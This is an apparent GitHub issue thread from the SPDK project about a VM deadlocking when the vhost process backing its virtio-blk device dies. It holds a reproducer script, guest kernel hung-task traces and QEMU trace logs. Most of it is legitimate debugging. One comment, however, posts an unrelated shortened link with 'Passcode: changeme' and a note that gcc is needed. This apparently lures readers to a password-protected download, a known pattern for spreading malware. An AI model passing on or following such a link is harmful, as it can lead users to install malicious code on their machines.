### ISSUE TITLE
VM left in unusable state when vhost  terminates

### ISSUE THREAD

**Issue by mikeBashStuff** [spdk/spdk#3519]
# Sighting report

```
SPDK: latest
QEMU: 8.0.0 (tested under 9.x as well)
VM_IMAGE: fedora38, kernel 6.5 (tested with fedora39 and kernel 6.9 a well)
```
This is a #3416 fork which focuses on potential issue with `vhost<->qemu<->kernel` interaction. 

As described in the aforementioned issue, when vhost - with connected blk controller to a VM - terminates, the overall state of the VM becomes highly unstable. Consider this simple reproducer, based on SPDK `test/vhost/*` infra:

```
# ./configure --with-vhost --disable-tests --disable-unit-tests
# ./brick-vm:
#!/usr/bin/env bash

rootdir=$PWD
source "$rootdir/test/common/autotest_common.sh"
source "$rootdir/test/vhost/common.sh"

TEST_MODE=iso vhosttestinit
vhost_run -n 0

vhost_rpc \
        0 \
        bdev_malloc_create \
        128 512 \
        -b malloc_test

vhost_rpc \
        0 \
        vhost_create_blk_controller \
        naa.malloc_test.0 malloc_test

vm_setup \
        --os="$VM_IMAGE" \
        --disk-type=spdk_vhost_blk \
        --os-mode=backing \
        --disks=malloc_test \
        --force=0

vm_run 0

vm_wait_for_boot 30 0
vhost_kill 0
# Now check state of the VM
```

This simply boots a single VM, attaches vhost blk controller (backed up by malloc bdev), waits until VM is fully online and then terminates the `vhost` process. At a first glance, there's no indication on the VM side that anything bad happened (kernel doesn't complain, nor qemu). However, an attempt to perform any access on the leftover block device (connected to virtio bus) ends up in a complete deadlock. E.g.:

```
[root@vhostfedora-cloud-23052 ~]# echo w >/proc/sysrq-trigger
[   65.644978] sysrq: Show Blocked State
[   65.646028] task:blkid           state:D stack:0     pid:872   ppid:840    flags:0x00000002
[   65.648187] Call Trace:
[   65.648822]  <TASK>
[   65.649627]  __schedule+0x3ee/0x14c0
[   65.650858]  ? __blk_flush_plug+0xf5/0x150
[   65.652206]  schedule+0x5e/0xd0
[   65.653232]  io_schedule+0x46/0x70
[   65.654476]  folio_wait_bit_common+0x13d/0x350
[   65.655945]  ? __pfx_wake_page_function+0x10/0x10
[   65.657373]  filemap_get_pages+0x5fb/0x630
[   65.658616]  ? __mod_memcg_lruvec_state+0x4e/0xa0
[   65.660086]  filemap_read+0xd9/0x350
[   65.661251]  blkdev_read_iter+0x6b/0x1b0
[   65.662468]  vfs_read+0x1fe/0x350
[   65.663573]  ksys_read+0x6f/0xf0
[   65.664640]  do_syscall_64+0x5d/0x90
[   65.665801]  entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[   65.667003] RIP: 0033:0x7f9f554480b1
[   65.667628] RSP: 002b:00007ffe1f17cd28 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
[   65.668949] RAX: ffffffffffffffda RBX: 000055f009640830 RCX: 00007f9f554480b1
[   65.670546] RDX: 0000000000000040 RSI: 000055f0096409d8 RDI: 0000000000000003
[   65.672094] RBP: 00007ffe1f17cd70 R08: 000055f009640a10 R09: 00007f9f5551bce0
[   65.673668] R10: 000055f0096409c8 R11: 0000000000000246 R12: 0000000007ff0000
[   65.675186] R13: 0000000000000040 R14: 000055f0096409b0 R15: 000055f009640888
[   65.676758]  </TASK>
[   65.677272] task:parted          state:D stack:0     pid:873   ppid:840    flags:0x00004002
[   65.678424] Call Trace:
[   65.678807]  <TASK>
[   65.679161]  __schedule+0x3ee/0x14c0
[   65.679797]  ? finish_task_switch.isra.0+0x94/0x2f0
[   65.680489]  schedule+0x5e/0xd0
[   65.681127]  schedule_timeout+0x151/0x160
[   65.681732]  io_schedule_timeout+0x50/0x80
[   65.682461]  wait_for_completion_io+0x8a/0x160
[   65.683145]  submit_bio_wait+0x61/0x90
[   65.683754]  blkdev_issue_flush+0x4d/0x80
[   65.684364]  ? __pfx_submit_bio_wait_endio+0x10/0x10
[   65.685125]  blkdev_fsync+0x46/0x60
[   65.685714]  __x64_sys_fsync+0x3b/0x70
[   65.686307]  do_syscall_64+0x5d/0x90
[   65.686858]  ? syscall_exit_to_user_mode+0x2b/0x40
[   65.687388]  ? do_syscall_64+0x6c/0x90
[   65.687833]  ? do_syscall_64+0x6c/0x90
[   65.688346]  ? do_syscall_64+0x6c/0x90
[   65.688752]  ? do_syscall_64+0x6c/0x90
[   65.689214]  entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[   65.689956] RIP: 0033:0x7f3c4ce94da4
[   65.690396] RSP: 002b:00007fffcf7c5db8 EFLAGS: 00000202 ORIG_RAX: 000000000000004a
[   65.691221] RAX: ffffffffffffffda RBX: 0000560c1d483dc0 RCX: 00007f3c4ce94da4
[   65.692011] RDX: 0000000000000014 RSI: 00007f3c4d03faa6 RDI: 0000000000000003
[   65.692855] RBP: 00007fffcf7c5df0 R08: 0000000000000001 R09: 0000000000000000
[   65.693743] R10: 00007f3c4cf11ac0 R11: 0000000000000202 R12: 0000560c1d483240
[   65.694662] R13: 0000560c1d483dc0 R14: 0000560c1d483240 R15: 00007f3c4d03f8d4
[   65.695522]  </TASK>
```

This also prevents VM from a clean reboot as during shutdown most processes from different services will enter similar state. Kernel is also completely unresponsive to any attempts to poweroff|reset via `sysrq`. Even if kernel somehow manages to enter reboot stage, on next boot deadlock quickly occurs inside initrd (same reasons - whatever process attempts to operate on block subsystem, will simply never return from the kernel). If we remove initrd from the picture and allow kernel too exec init directly from the target rootfs, same thing happens when services are being brought up. 

Similar case was seen for vfio-user where a workaround was attempted cc1a07f73a0fbb33ab3afac0a9fec4dc562fe902 (see full description of the issue https://github.com/spdk/spdk/issues/3322#issuecomment-2083092076).

In fact, similar workaround works in this case as well, i.e. explicit removal of the lingering virtio device from the bus. However, even if we do so and then attempt to reboot the kernel, the same virtio device is picked up yet again during boot and deadlock happens regardless. 

The only way to recover is to kill qemu instance and boot the VM under a new one.

We need to figure out which part is at fault here - `vhost`, `qemu`, `kernel`. `vhost` clearly triggers the issue in a first place, but maybe the other pieces are doing something wrong or they *don't* do something as expected. 

We have been seeing plenty of different intermittent issues, around `vm_wait_for_boot()` where for some unknown reason VM was not fully booted in time (in fact, the boot was simply "stuck") - whatever is causing this particular issue is probably causing all those intermittent ones.

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mikeBashStuff** [comment]
Just a small update: same thing happens under qemu 9.1.0 with f40 (kernel 6.10.10) inside the VM. 

So at this point, I am completely confused how `vhost` can be used as a service  (i.e. with `virtio_blk`), like described here https://github.com/spdk/spdk/issues/3504  - this issue describes use-case where vhost is being "restarted" at some point, yet it doesn't yield the same result as I see here (btw, I see the exactly same behavior with latest SPDK and the LTS).

**Comment by mikeBashStuff** [comment]
After adding some tracing to qemu, I can see that the cleanup of the vhost device takes place, but that doesn't seem to take any effect on the guest:

```
qemu-system-x86_64: Unexpected end-of-file before all data were read
qemu-system-x86_64: Unexpected end-of-file before all data were read
vhost_dev_stop 0x55b255991e90:virtio-blk vrings:1
qemu-system-x86_64: Failed to set msg fds.
qemu-system-x86_64: Failed to set msg fds.
qemu-system-x86_64: vhost VQ 0 ring restore failed: -22: Invalid argument (22)
qemu-system-x86_64: Failed to set msg fds.
qemu-system-x86_64: vhost VQ 1 ring restore failed: -22: Invalid argument (22)
qemu-system-x86_64: Failed to set msg fds.
virtio_queue_notify vdev 0x55b255991be0 n 0 vq 0x55b25599af70
virtio_queue_notify vdev 0x55b255991be0 n 1 vq 0x55b25599b008
vhost_dev_cleanup 0x55b255991e90
vhost_commit Started: 0 Changed: 1
vhost_dev_stop 0x55b255849140:virtio-blk vrings:1
qemu-system-x86_64: Failed to set msg fds.
qemu-system-x86_64: Failed to set msg fds.
qemu-system-x86_64: vhost VQ 0 ring restore failed: -22: Invalid argument (22)
qemu-system-x86_64: Failed to set msg fds.
qemu-system-x86_64: vhost VQ 1 ring restore failed: -22: Invalid argument (22)
qemu-system-x86_64: Failed to set msg fds.
virtio_queue_notify vdev 0x55b255848e90 n 0 vq 0x55b255851ca0
virtio_queue_notify vdev 0x55b255848e90 n 1 vq 0x55b255851d38
vhost_dev_cleanup 0x55b255849140
```

Though this:
```
qemu-system-x86_64: vhost VQ 0 ring restore failed: -22: Invalid argument (22)
```

seems to indicate that the `vhost_get_vring_base()` call failed. If this is essentially a wrapper for `ioctl` sending the `VHOST_GET_VRING_BASE ` and according to DPDK's `vhost_lib`:

```
VHOST_GET_VRING_BASE is used as the signal to remove the vhost device from the data plane
```
then would that indicate guest didn't really get a chance to be notified about the actual removal? Though some notifications clearly were sent out (but again, after all this, status of the virtio devices inside the guest doesn't change at all).

**Comment by mikeBashStuff** [comment]
All this somehow makes me think that the actual work should be done on qemu's side - when it realizes that the backend is dead (SPDK's vhost) in my mind it should tear vdevs as well, since they are no longer usable anyway.
